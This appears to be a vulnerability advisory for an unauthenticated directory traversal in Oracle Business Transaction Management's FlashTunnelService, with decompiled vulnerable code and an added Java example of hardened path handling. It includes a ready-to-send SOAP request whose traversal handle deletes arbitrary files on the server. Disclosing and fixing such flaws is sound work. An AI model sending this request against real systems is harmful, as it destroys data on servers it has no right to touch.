Oracle Business Transaction Management Server FlashTunnelService 
Remote File Deletion

tested against: Microsoft Windows Server 2003 r2 sp2
                Oracle WebLogic Server 12c (12.1.1)
                Oracle Business Transaction Management Server (Production version)

files tested: 
oepe-indigo-installer- (weblogic)
download url:       (BTM, production version) 
download url:

The product installs a web service called "FlashTunnelService"
which can be reached without prior authentication and which
processes incoming SOAP requests.

It can be reached at the following uri:

This SOAP interface exposes the 'deleteFile' function, which
could allow an attacker to delete arbitrary files with
administrative privileges on the target server through a
directory traversal vulnerability.
This could be useful for further attacks.

Example packet:

POST /btmui/soa/flash_svc/ HTTP/1.1
Accept-Encoding: gzip,deflate
Content-Type: text/xml;charset=UTF-8
SOAPAction: ""
User-Agent: Jakarta Commons-HttpClient/3.1
Host: [host]:7001
Content-Length: [length]

<soapenv:Envelope xmlns:soapenv="" xmlns:int="" xmlns:typ="">
         <int:deleteFile handle="../../../../../../../../../../../../somepath/somefile.ext">

Vulnerable code, see the decompiled com.amberpoint.flashtunnel.impl.FlashTunnelServiceImpl class:

public IDeleteFileResponse deleteFile(IDeleteFileRequest request)
        throws SOAPFaultException
{
        DeleteFileResponse dfr = new DeleteFileResponse();
        // the handle comes straight from the unauthenticated SOAP request
        String handle = request.getHandle();
        // mapped to a File with no check that the result stays inside the intended directory
        File f = getFileFromHandle(handle);
        if(f != null) {
                // deletion branch; its body is not reproduced in this advisory
        }
        return dfr;
}
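
As an added example that is not part of this advisory or of Oracle's code, the following Java class places the naive handle-to-File mapping that the decompiled snippet relies on beside a hardened version that canonicalizes the resolved path and refuses anything outside a fixed base directory. The class name, the method names and the temporary base directory are assumptions made for this illustration; the traversal handle is the one from the example packet above.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;

// Added example (not Oracle's code): naive vs. hardened mapping of an
// untrusted "handle" onto a File under a service-owned base directory.
// HandleResolver, resolveUnchecked and resolveChecked are assumed names.
public class HandleResolver {
    private final File baseDir;

    public HandleResolver(File baseDir) throws IOException {
        // Canonicalize once so later prefix checks compare like with like.
        this.baseDir = baseDir.getCanonicalFile();
    }

    /** Naive mapping: concatenates the untrusted handle onto the base directory; "../" escapes it. */
    public File resolveUnchecked(String handle) {
        return new File(baseDir, handle);
    }

    /** Hardened mapping: canonicalizes the result and rejects anything outside baseDir. */
    public File resolveChecked(String handle) throws IOException {
        if (handle == null || handle.isEmpty()) {
            throw new IllegalArgumentException("empty handle");
        }
        File candidate = new File(baseDir, handle).getCanonicalFile();
        // Compare against base + separator so that "/tmp/base2" is not accepted for base "/tmp/base".
        String basePrefix = baseDir.getPath() + File.separator;
        if (!candidate.getPath().startsWith(basePrefix)) {
            throw new SecurityException("handle resolves outside base directory: " + handle);
        }
        return candidate;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sandbox: a temporary base directory holding one file the service "owns".
        File base = Files.createTempDirectory("flashtunnel-demo").toFile();
        File owned = new File(base, "upload1.dat");
        Files.write(owned.toPath(), "demo".getBytes());

        HandleResolver resolver = new HandleResolver(base);
        String traversal = "../../../../../../../../../../../../somepath/somefile.ext";

        // The unchecked mapping happily yields a path outside the base directory.
        System.out.println("unchecked: " + resolver.resolveUnchecked(traversal).getCanonicalPath());

        // The checked mapping accepts the legitimate handle...
        System.out.println("checked ok: " + resolver.resolveChecked("upload1.dat"));
        // ...and refuses the traversal handle before any delete() could run.
        try {
            resolver.resolveChecked(traversal);
        } catch (SecurityException e) {
            System.out.println("checked rejected: " + e.getMessage());
        }

        // Clean up the sandbox.
        owned.delete();
        base.delete();
    }
}
```

Compile and run with javac/java: the unchecked resolution prints a path well outside the temporary directory, while the checked one throws before anything could be deleted. Two caveats apply. The prefix check is only sound because both sides are canonicalized, so symlinks placed inside the base directory are resolved as well; and a stronger design avoids client-supplied path fragments altogether by handing out opaque handles that are looked up in a server-side table. Neither replaces requiring authentication on the endpoint itself.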

Proof-of-concept code is provided as an attachment.